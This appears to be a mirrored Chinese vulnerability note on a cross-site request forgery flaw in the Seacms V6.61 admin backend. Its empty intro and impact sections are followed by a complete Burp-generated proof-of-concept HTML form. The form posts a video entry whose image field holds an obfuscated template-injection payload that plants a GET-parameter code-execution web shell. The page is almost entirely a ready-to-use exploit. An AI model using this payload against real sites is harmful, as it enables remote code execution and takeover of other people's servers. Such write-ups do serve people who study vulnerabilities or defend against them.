menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Seacms V6.61 后台csrf chevron_right Seacms V6.61 后台csrf.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Seacms V6.61 后台csrf.md
    3.31 KB / 2021-07-15 20:02:56
        Seacms V6.61 后台csrf
=====================

一、漏洞简介
------------

二、漏洞影响
------------

三、复现过程
------------

`http://www.0-sec.org:10089/backend/`,用户名和密码为admin \| admin

    <html>
      <!-- CSRF PoC - generated by Burp Suite Professional -->
      <body>
      <script>history.pushState('', '', '/')</script>
      <!-- adjust action to your url -->
        <form action="http://www.0-sec.org/seacms/backend/admin_video.php?action=save&acttype=add" method="POST">
          <input type="hidden" name="v_commend" value="0" />
          <input type="hidden" name="v_name" value="getshell" />
          <input type="hidden" name="v_enname" value="ceshi" />
          <input type="hidden" name="v_color" value="#FF0000" />
          <input type="hidden" name="v_type" value="5" />
          <input type="hidden" name="v_state" value="5" />
          <input type="hidden" name="v_pic" value="{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}" />
          <input type="hidden" name="v_spic" value="" />
          <input type="hidden" name="v_gpic" value="" />
          <input type="hidden" name="v_actor" value="" />
          <input type="hidden" name="v_director" value="" />
          <input type="hidden" name="v_commend" value="0" />
          <input type="hidden" name="v_note" value="" />
          <input type="hidden" name="v_tags" value="" />
          <input type="hidden" name="select3" value="" />
          <input type="hidden" name="v_publishyear" value="" />
          <input type="hidden" name="select2" value="" />
          <input type="hidden" name="v_lang" value="" />
          <input type="hidden" name="select1" value="" />
          <input type="hidden" name="v_publisharea" value="" />
          <input type="hidden" name="select4" value="" />
          <input type="hidden" name="v_ver" value="" />
          <input type="hidden" name="v_hit" value="0" />
          <input type="hidden" name="v_monthhit" value="0" />
          <input type="hidden" name="v_weekhit" value="0" />
          <input type="hidden" name="v_dayhit" value="0" />
          <input type="hidden" name="v_len" value="" />
          <input type="hidden" name="v_total" value="" />
          <input type="hidden" name="v_nickname" value="" />
          <input type="hidden" name="v_company" value="" />
          <input type="hidden" name="v_tvs" value="" />
          <input type="hidden" name="v_douban" value="" />
          <input type="hidden" name="v_mtime" value="" />
          <input type="hidden" name="v_imdb" value="" />
          <input type="hidden" name="v_score" value="" />
          <input type="hidden" name="v_scorenum" value="" />
          <input type="hidden" name="v_longtxt" value="" />
          <input type="hidden" name="v_money" value="0" />
          <input type="hidden" name="v_psd" value="" />
          <input type="hidden" name="v_playfrom[1]" value="" />
          <input type="hidden" name="v_playurl[1]" value="" />
          <input type="hidden" name="m_downfrom[1]" value="" />
          <input type="hidden" name="m_downurl[1]" value="" />
          <input type="hidden" name="v_content" value="" />
          <input type="hidden" name="Submit" value="�¡®�®š�浜¤" />
          <input type="submit" value="Submit request" />
        </form>
      </body>
    </html>
    links
    file_download